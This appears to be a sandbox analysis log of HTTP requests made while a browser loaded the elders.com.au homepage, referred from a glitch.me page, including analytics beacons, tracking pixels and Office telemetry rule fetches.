      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F
      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /libs/granite/csrf/token.json HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/logos/Red_logo.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"
      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s5288101782031?AQB=1&ndh=1&pf=1&t=6%2F10%2F2024%200%3A29%3A53%203%20300&mid=01878392218234141113567963242819045089&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=01878392218234141113567963242819045089&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1 HTTP/1.1Host: eldersrural.sc.omtrdc.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /bin/el/localised-news?branchId= HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605
      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=Zyr_0wAAAJ46RQN- HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=06707212550236574584203622074167040076
      Source: global trafficHTTP traffic detected: GET /tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870995967&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&cs_est=true&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870995967&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&cs_est=true&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bin/el/local-branch?branchId=1669702755463&type=default HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s5288101782031?AQB=1&ndh=1&pf=1&t=6%2F10%2F2024%200%3A29%3A53%203%20300&mid=01878392218234141113567963242819045089&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=01878392218234141113567963242819045089&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1 HTTP/1.1Host: eldersrural.sc.omtrdc.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /.model.json HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF&co=aHR0cHM6Ly9lbGRlcnMuY29tLmF1OjQ0Mw..&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=zg3yu5qpps7e HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect
      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
